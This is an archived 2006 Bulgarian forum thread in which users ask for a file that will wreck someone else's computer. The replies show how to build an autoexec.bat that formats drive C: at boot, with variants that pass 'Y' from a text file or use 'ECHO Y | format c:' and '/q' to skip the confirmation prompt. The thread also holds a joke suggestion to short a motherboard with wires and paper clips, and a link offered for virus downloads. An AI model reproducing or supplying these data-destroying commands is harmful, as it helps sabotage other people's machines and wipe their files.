PDA

View Full Version : Търся файла Autoexec.bat



09-02-2006, 13:19
Iskam go toq Fail Molq vi se ka4ete go nqkude i mi daite link spe6no mi trqbva ! davaite link za kakufto i da bilo fail koito 6te sasipe Kompa ili nai -malkoto da mu otvori mn rabota napotrebitelq [-o<

Bisollini
09-02-2006, 14:26
i Az Sun kandidat da RAzbera

HakeR
09-02-2006, 16:23
mi napravete si go toq fail,elementarno e
otvarqte notepad napisvate komandata k0qto iskate da se izpulni naprimer: format C: i posle natiskate na fail>save az i seifate s imeto autoexec.bat kato ne zabravqite da slojite raz6irenieto .bat

no ako si mislite 4e kato go zamenite s originalniq i pri startirane na windows 6te se formatira disk C: nqma da stane,neznam za6to,probval sam go i ne stava

Bisollini
09-02-2006, 21:15
E Bate Nestava Pak I az probvah AMa ne6te dai napravo ti napravi nqkuf takuf fail

HakeR
09-02-2006, 22:19
ami ako se opitvate da go zamenite s originala i pri restart da se formatira nqma da stane
ama kakto ste go napravili i kliknete na nego i se otvarq dosovsko prozor4e i pita dali iskate da formatirate dadeniq disk i ima (Y;N) i ako izberete y qsno kakvo 6te stane

Bisollini
09-02-2006, 22:21
Zna4i Prava si Na Notepad tfa Echo | format C:
davam asve as kato autoexec.bat I sled restart na Windowsa 6te me pita dali da dam Y;N taka li ? ?

HakeR
09-02-2006, 22:26
а бе значи аз съм го правил написвам на нотепад само това "format c:"
и нали го сеифам и ако кликна на фаила да го отворя ми се показва тва дето казах,а като го заменя с оригиналния и като рестартирам windowsa си се зарежда и нищо не става не ме пита нищо само като кликна на фаила

Bisollini
09-02-2006, 22:35
e na4i ni6to

WILD__BOY
09-02-2006, 23:25
Отвори компа
сложи го така че дънната платка да е във хоризонтално положение с лицевата страна към теб и пускай медни телчета и кламери.

Депресиран
09-03-2006, 02:24
що си мислите, че може да се форматира Ц-то със зареден Уиндоус от него - само това не мога да разбера...

WILD__BOY
09-03-2006, 07:29
що си мислите, че може да се форматира Ц-то със зареден Уиндоус от него - само това не мога да разбера...
Щот има хитри хора!

InHell
09-03-2006, 14:15
само с format c: не става, защото след това се изисква натискане на бутон(yes/no/abort)
За целта се прави един текстов файл с едно Y вътре. След внасяне на командата format в autoexec-а, на долния ред трябва да се напише <<името на текстовия файл
и тогава вече си форматира без проблем при пускане на autoexec.

P.S> къде сте тръгнали да пипате, като не знаете що е то DOS!?
И не става така както си го мислите, `щото файла се намира на друго място и е със различно разширение(NT kernel).

Bisollini
09-09-2006, 00:37
format C: /q :D За тези които мислят, че не може да се форматира докато зарежда уинбоза :roll:Smisal ?

InHell
09-09-2006, 13:06
като зададеш аргумента /q не пита дали искаш да направиш нещо, а направо го прави. Когато се изпълнява autoexec.bat харда не е в "Lock" ;)
Напълно убеден ли си в това което казваш? Честно да ти кажа, не бях сигурен, тъй като тези неща ги правя механично, и не обръщам внимание на това, дали ме пита или не. Специално за теб въведох описаната от теб команда. Искаш ли да знаеш какъв е резултата? Или сам ще се усетиш, че пишеш глупости?

Друк е въпросът, че бозата не е чак толкова тъпа. Ако си си правил труда да погледнеш, има един файл който се казва autoexec.baк, за какво мислиш се ползва той? При въвеждане на командата format c: /q нямаше никакъв резултат, още повече, че след като се стартира ОС, редът въведен по-рано липсва. Сега да не ми кажеш, че съм заправил да го save-на!? :P

InHell
09-10-2006, 12:10
Сигурно е. Пробвах го на МЕ.

rash0000
09-10-2006, 14:07
zanimawal sym se s autoexec.bat ili kakto se kazwa 1 vo seki windows triwba da go iam w c:\ skrit za celta nakaraite windowsa wi da pokaji sistemnite i skritite failove ot toools -> internet options folder options i tam view i tam ima edno show all hhidel files i pod nego imashe neshto show sistem files ili neshto podobno

a komandata e ECHO Y | FOrmat c:\


i se chete winagi se saglaswai s Y pri startirane na tazi komanda :D
mirk hackeri :D a tyrsete w neta wirus w zip format tam obesnqwat powe4e www.xaks.hit.bg